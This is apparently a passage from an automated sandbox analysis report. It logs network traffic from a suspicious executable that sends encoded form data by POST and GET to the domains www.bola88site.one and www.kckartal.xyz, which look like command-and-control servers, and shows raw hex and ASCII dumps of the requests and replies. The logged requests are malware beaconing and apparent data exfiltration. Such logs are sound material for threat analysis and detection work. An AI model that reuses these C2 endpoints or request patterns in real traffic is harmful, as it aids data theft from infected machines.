2b 56 41 76 45 6c 45 58 44 70 44 44 71 65 64 76 42 39 77 4c 77 6c 74 4e 62 46 35 44 76 38 38 58 63 4f 56 4d 2b 71 4f 52 45 71 44 39 71 42 53 43 66 [TRUNCATED]
                                        Data Ascii: OlTXe=cgJ0RJsNAcCJKapGdJaN/PMnj0blGMsozLVu7BwE+BGqsS+GGBAoTG+SPMhctY47fG+QMZ2/HcRSqCNBuH9sK03V8Ka+X6yFy2ow8+YQVVz8hTOOpeIsh34+6jw3pBsPfdhXOOq+3/YxGuGshpyQ0oDqXqlbnltdVNJKOZKuWebFp42CzlXnWm0tDAC/ntDaM44qV5sT6ajfuzO839nRMimkAeOfiGQm118BLb02AlKwNQmVy6kJ6rYc5hdVqNbcnfUElXQkJ1TtI2gyQCdgDrz+0rF+VAvElEXDpDDqedvB9wLwltNbF5Dv88XcOVM+qOREqD9qBSCf0WmiTkO5EvFXCsiB5BdGjToyEqxiGG43Ye9ZE4f+OIvNxQQW68xB7p33HQbuZgxp8eORtL5X+OgSTP8rZvBW8kG5cDUvGoGInY94h2rgDsPqBGVDUaEMjL99Md8a2JjiI/SBYxq326PhnKTGqUnimM18qGu2FuBre5vxTmV7vo803R9gR29f0pKbvPwFIN+9rgA2pvcfPHsAo3L9jOOTzsEuiB5jtOLoTwwt456y79xfrYBY0cswpXhn6JR9i4PXEPQDNKvZSha/5gEjAgXEA/PW693qvcjsQ9i4ztVF26dV0zNjsOIQKCVzRQsr1O1OOlG7iI6nOf0OMtWnKMYBrGF+VWaHZiitalnON7lKDwpGL/7AFosYsI/2g7GEyrTJDlqEHNYHSsMzdhskilX/9riAP/8BJXAXCUjsb7mARuOdM4gXYwld5k0WNkBwUsHQNQnx5CXYbdsTPzP1dyLP8VCQMuXsR2GtpJbquhM48c/jFmnvyqitl95x9Ak2ezzyfdTaerSxjgn4mzVBA0IVW4UUBGq1ceaUSfaekD/5KfgcQT+4LCasKFGaPHgBkr+QDPCSYSb0qigpteyqXKmCWnK7aCyF3HSl7WZ+/02UgKE4+0BYW6EdVYoFd5B7QEzM+hf+h+JvEoS5ZjUDaHFYfWyZqy+pUKuOnH [TRUNCATED]
                                        Sep 11, 2024 10:10:57.068576097 CEST218OUTData Raw: 32 34 77 70 71 56 31 58 4d 32 4d 6a 2f 77 56 37 44 55 2b 58 49 67 54 75 6e 51 36 41 48 32 47 32 61 35 75 36 2b 71 6d 57 32 47 37 48 30 46 4f 6d 48 63 56 53 35 75 78 6f 53 31 4b 76 57 39 43 71 2b 76 70 4c 42 78 64 49 57 75 2f 53 53 69 78 34 71 51
                                        Data Ascii: 24wpqV1XM2Mj/wV7DU+XIgTunQ6AH2G2a5u6+qmW2G7H0FOmHcVS5uxoS1KvW9Cq+vpLBxdIWu/SSix4qQB1129wP4nzaxl5LEgSB5ppAtvzZWrbmZf/Gv8y4okP7DegGuLZY48FvzKNkesIj2QBnns4fM+4dBJut98l3OVu8fayCDBfFwAjC/XyboJbat4D2lshj05SuOF5UCHCHVBuBLk6cT
                                        Sep 11, 2024 10:10:57.989214897 CEST1033INHTTP/1.1 404 Not Found
                                        Connection: close
                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                        pragma: no-cache
                                        content-type: text/html
                                        content-length: 796
                                        date: Wed, 11 Sep 2024 08:10:57 GMT
                                        server: LiteSpeed
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        27192.168.2.2249188172.96.191.39801544C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 11, 2024 10:10:59.370445013 CEST729OUTPOST /3lkx/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.bola88site.one
                                        Origin: http://www.bola88site.one
                                        Referer: http://www.bola88site.one/3lkx/
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Content-Length: 202
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Data Raw: 4f 6c 54 58 65 3d 63 67 4a 30 52 4a 73 4e 41 63 43 4a 4b 64 39 47 63 59 61 4e 77 50 4d 6e 6d 30 62 6c 4a 73 73 69 7a 4c 5a 49 37 45 51 55 2b 79 32 71 73 41 6d 47 47 55 30 6f 47 47 2b 52 45 73 68 51 7a 6f 34 75 66 47 2f 73 4d 59 4b 2f 48 63 56 53 6f 67 6c 42 73 47 39 74 49 45 33 4c 77 71 61 2f 58 36 33 35 79 32 6b 67 38 2b 41 51 56 54 54 38 69 54 2b 4f 2f 73 77 73 33 33 34 34 79 44 78 78 70 42 67 61 66 62 42 66 4f 4f 2b 2b 32 4c 59 78 47 2b 6d 73 6c 36 71 51 36 49 44 72 66 4b 6b 4e 33 6c 49 5a 4d 76 38 4c 4c 61 4f 35 5a 4b 71 34 69 4c 43 34 32 32 65 6d 61 57 30 6c 47 57 66 30 78 4f 43 66 58 41 3d 3d
                                        Data Ascii: OlTXe=cgJ0RJsNAcCJKd9GcYaNwPMnm0blJssizLZI7EQU+y2qsAmGGU0oGG+REshQzo4ufG/sMYK/HcVSoglBsG9tIE3Lwqa/X635y2kg8+AQVTT8iT+O/sws3344yDxxpBgafbBfOO++2LYxG+msl6qQ6IDrfKkN3lIZMv8LLaO5ZKq4iLC422emaW0lGWf0xOCfXA==
                                        Sep 11, 2024 10:11:00.293409109 CEST1033INHTTP/1.1 404 Not Found
                                        Connection: close
                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                        pragma: no-cache
                                        content-type: text/html
                                        content-length: 796
                                        date: Wed, 11 Sep 2024 08:11:00 GMT
                                        server: LiteSpeed
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        28192.168.2.2249189172.96.191.39801544C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 11, 2024 10:11:01.934922934 CEST2472OUTPOST /3lkx/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.bola88site.one
                                        Origin: http://www.bola88site.one
                                        Referer: http://www.bola88site.one/3lkx/
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Content-Length: 3626
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Data Raw: 4f 6c 54 58 65 3d 63 67 4a 30 52 4a 73 4e 41 63 43 4a 46 5a 42 47 66 2f 75 4e 34 50 4d 6d 71 55 62 6c 47 4d 73 6d 7a 4c 56 49 37 42 77 45 2b 41 36 71 73 52 32 47 47 78 41 6f 42 32 2b 52 43 73 68 63 74 59 34 6b 66 47 71 41 4d 5a 36 46 48 66 35 53 71 48 35 42 75 41 4a 73 44 55 33 56 30 71 61 38 58 36 32 6a 79 32 30 6b 38 2b 30 75 56 58 2f 38 6a 68 6d 4f 6f 73 77 76 72 6e 34 34 79 44 78 31 70 42 67 36 66 64 70 35 4f 4b 79 75 33 34 51 78 42 65 47 73 6e 5a 79 66 38 49 44 76 41 36 6c 46 6e 6c 52 73 56 4e 4a 47 4f 5a 75 49 57 65 66 46 70 72 2b 43 7a 6b 58 6d 64 57 30 79 4f 67 43 2f 36 39 44 59 4d 34 35 6f 56 35 73 54 36 65 6a 66 75 6a 4f 38 33 35 4c 57 49 69 6d 6b 4f 2b 4f 6f 6d 48 73 55 31 31 34 6a 4c 62 46 42 41 7a 47 77 4d 53 65 56 31 4b 6b 4a 39 62 59 61 35 68 64 59 67 74 61 7a 6e 66 4d 32 6c 58 41 4f 4a 31 54 74 49 30 6f 79 48 68 31 67 4b 62 7a 2b 72 37 46 2f 62 67 76 4c 6c 45 61 7a 70 44 33 71 65 63 33 42 2f 44 54 77 30 66 6c 55 57 4a 44 73 34 38 58 65 4b 56 4e 38 71 4b 78 69 71 44 30 69 42 54 79 66 [TRUNCATED]
                                        Data Ascii: OlTXe=cgJ0RJsNAcCJFZBGf/uN4PMmqUblGMsmzLVI7BwE+A6qsR2GGxAoB2+RCshctY4kfGqAMZ6FHf5SqH5BuAJsDU3V0qa8X62jy20k8+0uVX/8jhmOoswvrn44yDx1pBg6fdp5OKyu34QxBeGsnZyf8IDvA6lFnlRsVNJGOZuIWefFpr+CzkXmdW0yOgC/69DYM45oV5sT6ejfujO835LWIimkO+OomHsU114jLbFBAzGwMSeV1KkJ9bYa5hdYgtaznfM2lXAOJ1TtI0oyHh1gKbz+r7F/bgvLlEazpD3qec3B/DTw0flUWJDs48XeKVN8qKxiqD0iBTyf0VOiVFO5DfFIZciF9BBKjTwcErFYGFM3ZP9ZMa35TovU0QRX3cxa7pDZHVPuZSBp9dGRp65I1egVE/9zXPBK8n7/cDoGFd6I1Y94xFDhcMPjLmVJe6FVjL9PMccs37ziI/iBZiS326PmiKTIj0aYmMo7qGCmFvRrepfxTi570480jB9tYW9j0oruvPoVL8e9rDY2rtkfKntmu3L8++P7zsUuiD1ztOToTRwtqY6y99xb1oBx0ctepXlr6N1Hi+/XELMDLLvZIxaE7gEnWgW0A+3G69jQvdrsWcC4xYhF3adX8TNjiuIIKCNNRQBW1MVOOU27lo6kH/0POtWkOMYTrG1+VWWHZmetayTOKMRKagpAFf7aL4w4sIvQg+nByq/JC0qETbMIe8MPeRsyoFWo9riMP6QrJiMXCBXsZZODeuOaXohBFAlt5kk8NhxgXbvQNQXxsnDYatsTPzP2dyKn8VGEMqfGR2Gt7MnquSk4ls/mNGmqkaj8l+UN9AsIewnyFpHaerSutwn78DVGA0F3W4U2BGm1cM2UAciekgH5dPgcXT+/ZCatKFHfPCURkviQC+iSbUHzpSgkreyGMaidWnWjaDWFwwSl0kx++E2UpKE/1UAYLqBCVY0/d4QgQxvMx2T+j9RsP4S4XDUdaHBVfWqRqyWTUNKOmn [TRUNCATED]
                                        Sep 11, 2024 10:11:01.947081089 CEST1682OUTData Raw: 32 37 2f 35 71 59 79 58 4d 78 56 7a 2b 30 56 37 44 6d 2b 56 39 46 54 6f 4c 51 36 54 2f 32 42 43 4f 35 75 4b 2f 68 76 32 32 76 73 58 34 70 4f 68 50 51 56 58 46 59 78 5a 79 31 49 63 75 39 4a 2b 65 76 74 72 42 77 58 6f 57 5a 2f 54 75 47 78 34 36 69
                                        Data Ascii: 27/5qYyXMxVz+0V7Dm+V9FToLQ6T/2BCO5uK/hv22vsX4pOhPQVXFYxZy1Icu9J+evtrBwXoWZ/TuGx46iB3dQ9BT4hTax0P/HkSB/jJA0vzZyrbudf/rw8zgokOXDYQGtMpZS/FvtKN4ksIrMQB3ns5zMsoNBOut9hV3PLe8NeyOABfwLT3irSFHNJbvd7hi4qg+DzymSF9kiGxqoYothsPFppyCR2/AiqWBeol1qdUe6Uv8Gp
                                        Sep 11, 2024 10:11:02.844991922 CEST1033INHTTP/1.1 404 Not Found
                                        Connection: close
                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                        pragma: no-cache
                                        content-type: text/html
                                        content-length: 796
                                        date: Wed, 11 Sep 2024 08:11:02 GMT
                                        server: LiteSpeed
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        29192.168.2.2249190172.96.191.39801544C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 11, 2024 10:11:04.470293999 CEST458OUTGET /3lkx/?OlTXe=RihUS+ZcBcWtP49cUvm0lvpx13KYYtk0xYk2jkkE+x6ehgmefEg3A03kFcwA9a4nHW6JAbXkRdpGmWZgq18CGWb25/mMW/yooXsz9tlrWzKj4hGr16wEjBRj2jd5&th=XXRlJ2 HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.bola88site.one
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Sep 11, 2024 10:11:05.390116930 CEST1033INHTTP/1.1 404 Not Found
                                        Connection: close
                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                        pragma: no-cache
                                        content-type: text/html
                                        content-length: 796
                                        date: Wed, 11 Sep 2024 08:11:05 GMT
                                        server: LiteSpeed
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        30192.168.2.2249191104.21.20.125801544C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 11, 2024 10:11:10.494278908 CEST2472OUTPOST /h5qr/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.kckartal.xyz
                                        Origin: http://www.kckartal.xyz
                                        Referer: http://www.kckartal.xyz/h5qr/
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Content-Length: 2162
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Data Raw: 4f 6c 54 58 65 3d 79 5a 4f 39 61 42 37 34 57 33 41 33 75 5a 74 65 75 59 55 53 32 76 72 75 2b 32 37 71 34 62 66 57 46 4e 2b 76 32 4b 31 64 6d 5a 74 54 31 66 45 71 4c 73 4e 77 75 6f 4b 52 55 31 66 30 45 4f 75 4e 4e 63 30 30 45 59 35 72 38 46 5a 6c 77 42 56 52 55 35 4b 33 67 5a 41 69 30 4c 71 39 52 36 2b 6f 67 79 48 48 62 39 61 72 66 2b 67 2b 61 43 68 33 48 64 6d 4b 33 44 31 5a 48 71 79 37 4d 63 70 35 6e 2b 67 4d 4f 51 67 74 52 49 46 4d 65 69 49 56 42 50 46 46 42 73 66 2f 4c 70 71 4d 44 32 47 6b 6b 37 37 38 6e 64 6e 6b 54 71 42 41 49 75 7a 69 46 75 35 68 42 30 74 41 39 43 4d 47 31 48 49 7a 33 4c 79 6e 52 4e 36 48 4c 6d 4f 45 4a 58 6c 30 38 61 74 6a 61 36 68 50 2f 49 54 4f 41 34 6d 62 6d 33 6a 51 69 51 41 4f 43 6f 4e 70 4f 56 72 45 4b 79 64 78 66 79 75 61 33 31 36 61 58 37 2f 52 67 54 43 33 52 57 31 7a 50 67 6a 46 6d 48 34 51 34 78 42 34 4e 58 69 50 2f 6c 65 47 48 66 51 5a 36 78 37 62 72 35 71 64 50 4e 71 49 44 55 4d 52 6d 78 6d 6b 76 51 58 4c 6a 67 75 44 41 63 56 79 37 58 67 73 32 63 4a 65 67 4e 70 41 [TRUNCATED]
                                        Data Ascii: OlTXe=yZO9aB74W3A3uZteuYUS2vru+27q4bfWFN+v2K1dmZtT1fEqLsNwuoKRU1f0EOuNNc00EY5r8FZlwBVRU5K3gZAi0Lq9R6+ogyHHb9arf+g+aCh3HdmK3D1ZHqy7Mcp5n+gMOQgtRIFMeiIVBPFFBsf/LpqMD2Gkk778ndnkTqBAIuziFu5hB0tA9CMG1HIz3LynRN6HLmOEJXl08atja6hP/ITOA4mbm3jQiQAOCoNpOVrEKydxfyua316aX7/RgTC3RW1zPgjFmH4Q4xB4NXiP/leGHfQZ6x7br5qdPNqIDUMRmxmkvQXLjguDAcVy7Xgs2cJegNpAzfXY+PALhiaQcW5hqRno3c+zwQt0zWjDt/6lV9XgoJdM8v9B93CO1Ncs6xWkVE4Mp3WQ4vHW56xjnoxjcch4PhZtKBcqg29SjOlXpiIJ0BDDMLqJLa6y5LPZ28sL3CI87DaAUo0SpOfrSxg0MbrmhC+xgZDfDq9R2VKE7/fFzHMmqeC0siXwQTytRShaNvZfMS+o4U6USiF3+K4ufEsSq3BUsau0PS5B5kDuWvbsAEHhqKCPNlheWrIDyv1bop+WKZySTufR4zKeKgVLI2WIvQQ5XUE3QyNg3pqw7mc+RucQg6jsG1Tn+jQBx/ohTXDSDFdUrOg2KDdIDoZ9fy6B+rH6OsA3WuxnO1NAoOs2052dz0NL8pnnq/KtM6WDOK1Vl6+5uk7OjR1d9CIwPDPTLPqe5quGMkxVpZ+p5awsbsAc4i04YGMQONUoMa9x7+esS8EWQZCfL2j462d4d+59nt0XyiyWS0JVfyJmoeWdGzUayazWzf8XMkl9aF4PJryi+liCIbxeAHe9aWXLh5EDTkfC0KOh/luYFYUt4gD1c3lhuRqLB9xQMa/EPjlyGYbEOp1nLbq1bOk7u4pXmKjcYTth8CLv+GXfkb9IQKBBI6Hh0yWmzLhL1ZRpwXvVnfFBgk25+5iEu/KUuvQOpwxwopjWfuWzezbkY2 [TRUNCATED]
                                        Sep 11, 2024 10:11:10.499217987 CEST212OUTData Raw: 32 42 52 4d 53 65 4c 66 7a 37 65 33 34 38 6b 71 6e 70 4a 78 65 2f 74 4e 70 38 6c 37 6b 34 74 6c 6b 6a 78 32 74 2b 6c 36 31 6b 63 36 4c 35 53 5a 2f 38 50 49 71 4c 54 37 45 54 35 65 65 49 6c 6b 55 76 4f 73 50 2f 6d 50 54 5a 4f 68 45 67 30 31 74 31
                                        Data Ascii: 2BRMSeLfz7e348kqnpJxe/tNp8l7k4tlkjx2t+l61kc6L5SZ/8PIqLT7ET5eeIlkUvOsP/mPTZOhEg01t1rgKhFWpoAJc1EMQE4v3We9HCkDHRNCL1cCPsBvXMIoyR11uIapTarXlyXu4paaKeGJh7mDj7zYVfIwfzvHldZifWrbqaQ4Gz68330h6Hef8jbvxwycAumS5AVQKeNa4FCa
                                        Sep 11, 2024 10:11:11.106477022 CEST1236INHTTP/1.1 404 Not Found
                                        Date: Wed, 11 Sep 2024 08:11:11 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                        pragma: no-cache
                                        vary: User-Agent
                                        x-turbo-charged-by: LiteSpeed
                                        cf-cache-status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pJYBfm7tqo4fWLG5k%2BPUNyzicqDNMpOMPP8Lhk9gSxTuZmNQZBx0ce4elKfNMVrED7p2ulX%2Bq3jZqUHWC9R9xXqYxNBBDYVaRTqUFuOww61ExWBNG8%2BUl26Rs1B%2Fpuu4SGhM"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8c162f8128428c6b-EWR
                                        Content-Encoding: gzip
                                        alt-svc: h3=":443"; ma=86400
